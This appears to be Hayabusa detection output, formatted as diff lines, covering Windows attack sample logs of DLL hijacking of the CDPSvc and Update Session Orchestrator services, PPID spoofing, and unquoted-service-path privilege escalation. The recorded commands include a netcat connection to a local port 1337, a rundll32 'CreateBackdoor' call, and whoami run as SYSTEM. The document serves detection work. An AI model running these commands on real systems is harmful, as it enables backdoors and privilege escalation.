+2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:40.502 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 747F3D96-9F86-5E75-0000-00101A9F2100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 747F3D96-0880-5E76-0000-001014202B00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,../hayabusa-rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
